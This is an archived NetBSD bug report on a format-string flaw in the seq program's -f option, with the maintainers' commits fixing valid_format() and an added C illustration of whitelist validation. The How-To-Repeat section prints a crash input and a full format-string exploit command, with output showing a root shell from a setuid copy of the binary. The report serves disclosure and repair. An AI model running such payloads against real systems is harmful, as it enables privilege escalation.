NetBSD Problem Report #43355

From www@NetBSD.org  Tue May 25 19:22:53 2010
Return-Path: <www@NetBSD.org>
Received: from mail.netbsd.org (mail.netbsd.org [204.152.190.11])
	by www.NetBSD.org (Postfix) with ESMTP id 64B4D63B879
	for <gnats-bugs@gnats.NetBSD.org>; Tue, 25 May 2010 19:22:53 +0000 (UTC)
Message-Id: <20100525192252.A871D63B873@www.NetBSD.org>
Date: Tue, 25 May 2010 19:22:52 +0000 (UTC)
From: chomzee@ethernet.pl
Reply-To: chomzee@ethernet.pl
To: gnats-bugs@NetBSD.org
Subject: Format string attack in seq program
X-Send-Pr-Version: www-1.0

>Number:         43355
>Category:       bin
>Synopsis:       Format string attack in seq program
>Confidential:   no
>Severity:       non-critical
>Priority:       low
>Responsible:    bin-bug-people
>State:          closed
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Tue May 25 19:25:00 +0000 2010
>Closed-Date:    Thu May 27 08:46:29 +0000 2010
>Last-Modified:  Thu May 27 19:05:08 +0000 2010
>Originator:     Bartosz Chodorowski
>Release:        none
>Organization:
-
>Environment:
Linux aleurwal 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686 GNU/Linux
>Description:
The seq program compiled in a Linux environment is vulnerable to a format string attack. The problem does not occur on *BSD systems, because of the distinct C library implementation (printf function).

>How-To-Repeat:
chomzee@aleurwal:~/vulns$ ./seq -f %..%n 1 1
Segmentation fault

With randomized stack address space this vulnerability may be used to execute arbitrary code:

chomzee@aleurwal:~/vulns$ ls -l seq
-rwsr-sr-x 1 root root 12349 2010-05-25 16:39 seq
chomzee@aleurwal:~/vulns$ ./seq -f  `printf "\xbc\xef\xff\xbf"`____`printf "\xbd\xef\xff\xbf"`____`printf "\xbe\xef\xff\xbf"`____`printf "\xbf\xef\xff\xbf"`xxxx`perl -e 'print "%..%08x"x145'`%..%0193x%..%08n%..%060x%..%08n%..%0254x%..%08n%..%0184x%..%08n `perl -e 'print "0"x993'`1 1
#
# long program output
#
bash-3.2# whoami
root
bash-3.2#

>Fix:
Modify seq.c so that it won't allow strings like '%..%n' to get into the format.

>Release-Note:

>Audit-Trail:

Responsible-Changed-From-To: security-officer->bin-bug-people
Responsible-Changed-By: dholland@NetBSD.org
Responsible-Changed-When: Thu, 27 May 2010 08:04:41 +0000
Responsible-Changed-Why:
The only security problem here is that the submitter chmod +s'd his binary...


State-Changed-From-To: open->analyzed
State-Changed-By: dholland@NetBSD.org
State-Changed-When: Thu, 27 May 2010 08:04:41 +0000
State-Changed-Why:
The problem is that valid_format() is too permissive and allows some
invalid format strings through.


From: "David A. Holland" <dholland@netbsd.org>
To: gnats-bugs@gnats.NetBSD.org
Cc: 
Subject: PR/43355 CVS commit: src/usr.bin/seq
Date: Thu, 27 May 2010 08:30:35 +0000

 Module Name:	src
 Committed By:	dholland
 Date:		Thu May 27 08:30:35 UTC 2010

 Modified Files:
 	src/usr.bin/seq: seq.1 seq.c

 Log Message:
 Fix valid_format() to be more careful about allowing only valid printf
 formats.

 Also, accept %a and %A, which are new since this logic was last updated,
 and also allow %F even though it's not functionally different from %f.
 Document these additions and bump date of man page.

 Fixes PR 43355.


 To generate a diff of this commit:
 cvs rdiff -u -r1.6 -r1.7 src/usr.bin/seq/seq.1
 cvs rdiff -u -r1.5 -r1.6 src/usr.bin/seq/seq.c

 Please note that diffs are not public domain; they are subject to the
 copyright notices on the relevant files.

From: "David A. Holland" <dholland@netbsd.org>
To: gnats-bugs@gnats.NetBSD.org
Cc: 
Subject: PR/43355 CVS commit: src/usr.bin/seq
Date: Thu, 27 May 2010 08:40:20 +0000

 Module Name:	src
 Committed By:	dholland
 Date:		Thu May 27 08:40:20 UTC 2010

 Modified Files:
 	src/usr.bin/seq: seq.c

 Log Message:
 Rerun valid_format() both before and after unescaping the format
 string, in case the format string contains printf conversions
 assembled from escape sequences.

 A better approach might be to adjust the unescape logic to avoid
 generating printf conversions (e.g. convert \x25 to %% instead of %)
 but that's somewhat problematic and it's not really worth taking the
 trouble.

 Running valid_format() only after unescaping would also be somewhat
 tidier but makes printing the invalid format string problematic,
 because the unescape logic runs in place.

 None of these cases are really worth worrying about in detail, but now
 at least they don't result in SIGSEGV.

 Related to PR 43355.


 To generate a diff of this commit:
 cvs rdiff -u -r1.6 -r1.7 src/usr.bin/seq/seq.c

 Please note that diffs are not public domain; they are subject to the
 copyright notices on the relevant files.
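
The two commit messages above describe tightening valid_format() and rerunning it after unescaping. The following is an added illustration, not NetBSD's seq.c: a simplified whitelist validator and a small unescape routine (the names valid_format, unescape and check_user_format are the example's own), showing why the check has to run on both the raw and the unescaped string.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
/* Whitelist validator in the spirit of seq.c's valid_format() (an added
 * reimplementation, not NetBSD's code): at most one floating-point conversion,
 * literal %% allowed, anything else (%n, %s, "%..%") rejected. */
int valid_format(const char *fmt)
{
    unsigned conversions = 0;
    while (*fmt != '\0') {
        if (*fmt++ != '%')
            continue;                              /* ordinary text */
        if (*fmt == '%') { fmt++; continue; }      /* literal "%%" */
        while (*fmt != '\0' && strchr("#0- +'0123456789", *fmt))
            fmt++;                                 /* flags and field width */
        if (*fmt == '.')                           /* precision */
            while (isdigit((unsigned char)*++fmt)) {}
        if (*fmt == '\0' || strchr("aAeEfFgG", *fmt) == NULL)
            return 0;                              /* not a float conversion */
        conversions++;
        fmt++;
    }
    return conversions <= 1;
}

/* Minimal unescape (\n, \\, \xHH) into a separate buffer so the original
 * string survives for error messages; returns 0 if the buffer is too small. */
int unescape(const char *in, char *out, size_t outsz)
{
    size_t n = 0; unsigned v;
    for (; *in != '\0' && n + 1 < outsz; in++) {
        if (*in != '\\')        { out[n++] = *in; continue; }
        if (in[1] == 'n')       { out[n++] = '\n'; in++; }
        else if (in[1] == '\\') { out[n++] = '\\'; in++; }
        else if (in[1] == 'x' && isxdigit((unsigned char)in[2])
                 && isxdigit((unsigned char)in[3])) {
            sscanf(in + 2, "%2x", &v); out[n++] = (char)v; in += 3;
        } else
            out[n++] = '\\';                       /* keep unknown escapes */
    }
    out[n] = '\0';
    return *in == '\0';
}

/* Validate before AND after unescaping, as the second commit does: "\x25n"
 * contains no '%' until unescaped, so a single pre-unescape check passes it. */
int check_user_format(const char *fmt, char *out, size_t outsz)
{
    return valid_format(fmt) && unescape(fmt, out, outsz) && valid_format(out);
}
```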

State-Changed-From-To: analyzed->closed
State-Changed-By: dholland@NetBSD.org
State-Changed-When: Thu, 27 May 2010 08:46:29 +0000
State-Changed-Why:
Fixed.

Thanks for bringing this to our attention, but please don't raise false
security alarms; it does not get bugs fixed faster and ultimately only
serves to damage your own credibility.


From: Bartosz Chodorowski <chomzee@ethernet.pl>
To: gnats-bugs@NetBSD.org
Cc: 
Subject: Re: bin/43355 (Format string attack in seq program)
Date: Thu, 27 May 2010 19:25:46 +0200

 On 2010-05-27 you wrote:
 > State-Changed-From-To: analyzed->closed
 > State-Changed-By: dholland@NetBSD.org
 > State-Changed-When: Thu, 27 May 2010 08:46:29 +0000
 > State-Changed-Why:
 > Fixed.
 > 
 > Thanks for bringing this to our attention, but please don't raise false
 > security alarms; it does not get bugs fixed faster and ultimately only
 > serves to damage your own credibility.

 Okay, next time I will try to match category more carefully.

 Best regards,

 -- 
 Bartosz 'chomzee' Chodorowski

>Unformatted:
